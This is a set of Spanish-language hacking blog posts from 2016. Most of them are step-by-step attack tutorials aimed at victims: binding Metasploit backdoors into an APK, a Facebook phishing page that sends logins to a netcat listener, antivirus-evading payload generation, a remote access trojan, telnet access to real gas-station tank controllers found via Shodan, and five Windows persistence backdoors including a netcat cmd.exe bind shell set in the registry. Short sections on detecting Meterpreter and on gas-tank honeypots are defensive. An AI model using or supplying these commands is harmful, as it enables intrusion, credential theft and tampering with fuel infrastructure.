sábado, 24 de septiembre de 2016

SPADE: Embeber backdoor en APK

Definición:

Spade es un pequeño pero útil script que permite infectar fácilmente APKs con payloads de Android de Metasploit.

Tutorial:

Primero descargaremos una apk la cual queramos bindear con nuestro payload. En este caso se ha escogido CCLEANER.
 
Segundo descargaremos spade y bindearemos nuestra apk:

git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py [Ruta APK]


Nos preguntará que payload queremos usar. En este tutorial se ha escogido el 2 (reverse_https).



También nos preguntará la IP LOCAL y el puerto.
Y por último nos preguntará si queremos iniciar un listener con metasploit, le daremos a que si para ahorrarnos tiempo.

Pasaremos la apk a alguien y cuando la inicie nos abrirá una sesión con meterpreter. 

Vídeo:


viernes, 16 de septiembre de 2016

Xerosploit: Eficiente y avanzado framework man in the middle

Definición:

Xerosploit es un conjunto de herramientas de pruebas de penetración, cuyo objetivo es llevar a cabo el man in the middle para propósitos de prueba. Trae varios módulos que permiten realizar ataques eficientes, y también permite llevar a cabo ataques de denegación de servicio y la exploración de puertos. Desarrollado por bettercap y nmap.

Dependencias:

  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Instalación:

Las dependencias se instalarán automáticamente.
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit

Características:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download intercaption and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Webpage defacement and more ...

Tutorial:

Abrimos Xerosploit:
Usamos el comando help para la ayuda.

Lo primero que haremos será configurar nuestra IP y nuestro Gateway:
Con el comando iface configuramos nuestra IP.

Con el comando gateway configuramos la puerta de enlace.

Ahora haremos un escaneo de la red con el comando: scan
Para seleccionar el objetivo escribimos su IP.

Y volvemos a usar el comando help para ver los ataques disponibles.

Una vez seleccionado el ataque escribimos el comando run para ejecutarlo.

Para seleccionar otro ataque usamos back.

Vídeo:

*En el vídeo se hace una prueba del ataque dspoof el cual sirve para redireccionar todo el tráfico HTTP a la IP que nosotros queramos.



domingo, 11 de septiembre de 2016

¿Cómo detectar una shell Meterpreter en tu pc?

Definición:

Anti-Metasploit es una herramienta para detectar si está hackeado por alguien a través de Metasploit o no. Hoy en día, la mayoría de las veces nos tropezamos con las formas de cómo podemos hackear o cómo robar credenciales a alguien,  pero nadie te dice que la forma de detectar cuando estamos siendo atacados.

Así que, por lo tanto, en este artículo vamos a aprender cómo detectar si te están atacando a través de Metasploit. Y para esto hay dos herramientas:

  • Antipwny
  • Antimeter
Ambas herramientas nos ayudará a lograr nuestro objetivo. Estas herramientas ayudan a matar la sesión meterpreter que el hacker ha ganado.


Antipwny:

Cuando se le haga doble clic en el software, aparecerá un cuadro de diálogo se abrirá y se mostrará el archivo meterpreter que se ejecuta en el equipo como se muestra:


Para acabar con el proceso, haga clic derecho en el proceso y la opción de kill process.


Antimeter:
Al abrir este software, se explorará todo el equipo y mostrará el archivo que contiene el virus. Además, se le pedirá que matar el proceso o no. Por lo tanto, se escribe "y" para sí, el proceso va a morir.

Estas herramientas no sólo nos permiten detectar el archivo, pero nos ayuda a matar también que también en dos sencillos pasos. 

Descarga:


viernes, 9 de septiembre de 2016

ROBANDO CUENTAS DE FACEBOOK

Definición:

Los formularios html nos ayudan a aumentar la interactividad de nuestra Web y nos permiten recibir información de los usuarios de nuestro site. Los formularios html están compuestos por campos de texto y botones.
Una vez el usuario ha rellenado el formulario e introducido los valores en los campos, éstos son enviados para poder procesarlos. El envío de estos datos puede hacerse a un correo electrónico o a un programa que procese toda la información y nos ayude a hacer un seguimiento.

Los formularios son un tag más de html y, como todos los tags, debe ir indicado mediante una etiqueta. La etiqueta de los formularios es <form> y su cierre </form>. Todo lo que vaya dentro de estas etiquetas, serán partes del formulario.

La etiqueta <form> tiene una serie de atributos básicos que vamos a pasarte a explicar a continuación.

action
El atributo “action” indica el tipo de acción que va a realizar el formulario. Anteriormente indicamos que la información podía enviarse a un correo electrónico o a un programa que la gestione. Es mediante esta etiqueta que se gestionan los formularios.

Si queremos que el formulario se envíe a un correo, la acción quedaría escrita de la siguiente manera: <form action=mailto:direcciondelcorreo@correo.com…></form>. Este tipo de envíos se utilizarían para casos de formularios de contacto, de sugerencias, etc.

Si lo que queremos es que la información sea enviada a un programa que la gestione, debemos indicarle en la acción, la url del archivo donde se encuentra ubicado el programa que la gestionará. Lo escribiríamos de la siguiente manera: <form action="dirección completa del archivo que la gestionará" ...> </form>. Este tipo de envíos se utilizarían para casos de formularios de encuestas, cuestionarios, etc.

Tutorial:

1º- Entramos en facebook y descargamos la página de registro.

2º- Una vez descargada la abrimos con nuestro editor de texto y buscamos:

login_form

*Que es el identificador del formulario.

Ahora cambiaremos el atributo action por la IP de nuestro Netcat. Sería algo así:

action="http://192.168.1.131:8080/mrrobot.htm"

Donde la IP sea la de nuestro pc atacante el puerto que configuremos en netcat y nuestro usuario.

action="[IP]:[PUERTO NETCAT]/[USUARIO].htm"

3º- Ahora vamos a poner a la escucha nuestro netcat, para ello:

netcat -lvp 8080

4º- Por último usaremos técnicas de ingeniería social para infectar a una posible víctima, podemos encender un servidor apache y pasarle el link...

Vídeo:


Hacer en WAN:

  • Abrir puertos 80 (Para Apache) y 8080 (Para Netcat) del router.
  • XAMPP
    • ¿Cómo instalar XAMPP? XAMPP
      • ./xampp-linux.run

Tutorial:

1º- Ponemos a la escucha Netcat con:
netcat -lvp 8080

2º- Descargamos y modificamos la web de facebook como antes y la copiamos en: 
/opt/lampp/htdocs/facebookmalo.html

3º- Activamos el servicio Apache.
gksu /opt/lampp/manager-linux-x64.run

4º- Ahora con los puertos abiertos en el router vamos a ver cual es nuestra IP pública:
Cuál es mi IP

5º- Cuando la sepamos la copiamos y le añadimos la ruta de nuestra web, quedaría algo así:
87.219.199.10/facebookmalo.html

6º- Pasamos ese link por un acortador de url:
Bitly

7º- Y el enlace que nos saldrá se lo pasamos a alguien mediante ingeniería social.

HERCULES: GENERA UN PAYLOAD Y EVADE LOS ANTIVIRUS

Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL! porque dejaría de ser FUD.

Tutorial:

  • ./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic
“./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]”
Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:
  • nc –l –p [PUERTO]
+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:

Descarga:

Vídeo:



jueves, 8 de septiembre de 2016

HTTP RAT BACKDOOR WEBSERVER
Definición:
HTTP RAT es un tipo de troyano de acceso remoto que utiliza interfaces web y el puerto 80 para obtener acceso. Puede entenderse simplemente como un túnel de HTTP, excepto que funciona en la dirección inversa. Estos troyanos son comparativamente más peligroso ya que estos funcionan en la web y por lo tanto funciona en casi todas partes donde se puede encontrar internet.

Requisitos:

  • Sistema Operativo Windows (Atacante)
  • Sistema Operativo Windows (Víctima)

Tutorial:

Abrimos HTTP RAT lo configuramos a nuestro gusto y le damos a create, nos creará un ejecutable.
Pasamos el ejecutable a nuestra víctima y lo ejecutamos, se creará un proceso en background de un servidor.
Ahora ponemos la IP de la víctima en nuestro navegador y veremos esto:

Detección por antivirus:

Descarga:

Vídeo:


miércoles, 7 de septiembre de 2016

ACCEDIENDO AL SISTEMA DE CONTROL DE LAS GASOLINERAS

Descripción :

Los conversores de serie a Ethernet del tipo GC-NET2 32-DTE que utilizan las gasolineras españolas, por el puerto 10001, para controlar los tanques de combustible eran vulnerables (más que vulnerables, mala securización).
Este conversor envia datos a un servidor y monitoriza el estado de los tanques de combustible: tipo de combustible almacenado, temperatura del combustible dentro del tanque, cantidad de combustible que queda, porcentaje de agua
Mediante este sistema, los administradores de las gasolineras saben cuando pedir combustible a la central, verificar si algo no va bien dentro de los tanques (temperatura, fugas, etc) y alarmar en caso que fuese necesario y tomar medidas.
Entramos en SHODAN. (Una página web donde se albergan miles de direcciones IP vulnerables)
Una vez en SHODAN aplicamos un filtro: country:es port:10001 para ver los conversores de España, abrimos una terminal y nos conectamos mediante telnet a una de esas ips. Y ya estamos dentro del servidor. Muchas de ellas tienen deshabilitadas las contraseñas y en otras bastaba con leer el manual, una vez dentro solo hay que poner los códigos necesarios para gestionarlo.
Con toda esta información ya se puede administrar los tanques de combustible de la gasolinera.

Vídeo :


Honeypots:

Definición:

Un honeypot, o sistema trampa o señuelo, es una herramienta de la seguridad informática dispuesto en una red o sistema informático para ser el objetivo de un posible ataque informático, y así poder detectarlo y obtener información del mismo y del atacante. Solo conozco dos honeypots para depositos de gas que son los siguientes:
  1. GasPot
  2. Conpot

GasPot:

Definición:

GasPot es un honeypot que ha sido diseñado para simular un AST Veeder Root Gaurdian. Estos medidores de tanques son comunes en la industria del petróleo y el gas para los tanques de gasolinera para ayudar con el inventario de combustibles. GasPot fue diseñado para aleatorizar tanto como sea posible de modo que no hay dos casos exactamente el mismo aspecto.

Instalación:

cd /opt
git clone https://github.com/sjhilt/GasPot.git
chmod 777 -r GasPot/
cd GasPot
mv config.ini.dist config.ini
python GasPot.py
Archivo de configuración de GasPot:
 config.ini

Como conectarnos:

Abrimos una terminal y escribimos el siguiente comando:
telnet [IP LOCAL] 10001
Ctrl+^+A I20100

Vídeo Demo GasPot:

ConPot:

Conpot es un honeypot ICS con el objetivo de recoger información de inteligencia sobre los motivos y métodos de adversarios atacan a los sistemas de control industrial. ConPot no solo nos vale para tanques de gasolina sino que tiene más utilidades pero en esta entrada solo vamos a ver esa.

Dependencias:

apt-get install python-pip
pip install -U pip
apt-get install python-dev libmysqlclient-dev
pip install MySQL-python
sudo apt-get install libsmi2ldbl snmp-mibs-downloader python-dev libevent-dev libxslt1-dev libxml2-dev

Instalación:

Versión Estable:

pip install conpot


Última Versión:
cd /opt
git clone https://github.com/mushorg/conpot.git
cd conpot
python setup.py install

Archivos de configuración de conpot:
/usr/local/lib/python2.7/dist-packages/Conpot-0.5.1-py2.7.egg/conpot/templates/guardian_ast/template.xml

Uso:

conpot -t guardian_ast

Como conectarnos:

telnet [IP LOCAL] 10001
Ctrl+^+A I20100 
*Lista completa de comandos

Vídeo Demo Conpot:



martes, 6 de septiembre de 2016

5 BACKDOORS PERSISTENTES

Requisitos:

  • Sesión meterpreter con permisos elevados (Bypass UAC)
  • Metasploit
  • Netcat
  • Distribución Linux (Atacante)
  • Windows (Víctima)

Definición de backdoor:

Tipo de troyano que permite el acceso al sistema infectado y su control remoto. El atacante puede entonces eliminar o modificar archivos, ejecutar programas, enviar correos masivamente o instalar herramientas maliciosas. Los backdoors y troyanos no son exactamente lo mismo aunque, a día de hoy, muchos troyanos incorporan funcionalidades de backdoor para poder acceder a la máquina infectada cuando lo desee el atacante, para seguir realizando sus actividades maliciosas.

Persistencia:

En la sesión meterpreter con permisos elevados:
  • run persistence –X –i 10 –p 443 –r [IP]
-X= Conectarse cuando el sistema reinicie.
-i 10= Intentar conectarse cada 10 segundos.
-p 443= Puerto de conexión reversa.
-r ip= IP de conexión reversa-
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
  • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LPORT 443
    • set LHOST [IP LOCAL]
    • exploit

s4u_persistence:

Crea una tarea programada que se ejecutará utilizando el servicio para el usuario (S4U). Esto permite que la tarea programada para ejecutarse incluso como un usuario sin privilegios que no se registra en el dispositivo. Esto resultará en contexto de seguridad más bajo, lo que permite el acceso sólo a los recursos locales. El módulo requiere ‘Logon as a batch job’ permisos (SeBatchLogonRight).
Pondremos en background la sesión meterpreter con bypass uac y:
  • use exploit/windows/local/s4u_persistence
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 443
    • set trigger logon
    • set session [Número sesión]
    • exploit
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
  • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • exploit

VSS_PERSISTENCE:

Este módulo intentará crear un payload persistente en una nueva instantánea de volumen. Esto se basa en la secuencia de comandos VSSOwn publicado originalmente por Tim Tomes y Mark Baggett. Este módulo ha sido probado con éxito en Windows 7. Con el fin de lograr la persistencia a través de la opción RUNKEY, el usuario debe necesitar una contraseña para iniciar sesión en el equipo atacado.
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
  • use exploit/windows/local/vss_persistence
    • set runkey true
    • set schtask true
    • set RHOST [IP VÍCTIMA]
    • set session [Número sesión]
    • exploit
Ahora al ejecutar el exploit se creará un backdoor y una nueva sesión meterpreter.
Ahora al reiniciar el equipo víctima se perderán las sesiones meterpreter, usa el siguiente comando para abrir una nueva:
  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4444
    • exploit

REGISTRY PERSISTENCE:

En este módulo se instalará un payload que se ejecutará durante el arranque. Será ejecutado ya sea al iniciar la sesión de usuario o el inicio del sistema mediante el valor de registro en “CurrentVersion \ Run” (dependiendo de privilegio y método seleccionado). El payload se instalará completamente en el primer registro de la sesión fondo meterpreter y luego ejecutar los comandos:
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
  • use exploit/windows/local/registry_persistence
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4545
    • set startup system
    • set session [Número de la sesión]
    • exploit
Ahora al reiniciar el sistema perderemos las sesiones asique usaremos los siguientes comandos para abrir una nueva:
  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4545
    • exploit

NETCAT:

Netcat es una utilidad de red ofrecido que lee y escribe datos a través de conexiones de red, utilizando el protocolo TCP / IP.
Después de tener nuestra sesión meterpreter con bypass uac pondremos:
  • upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
Ahora vamos a setear el valor del registro:
  • reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’
Abrimos una shell con el comando:
  • shell
Y abriremos el puerto en el firewall:
  • netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445
Para saber que todo está bien configurado pondremos:
  • netsh firewall show portopening
Veremos que tenemos la regla de netcat en el firewall.
Una vez reiniciemos el pc víctima, para conectarnos a él usaremos el comando:
  • nc  -nv [IP VÍCTIMA] [PUERTO/4445]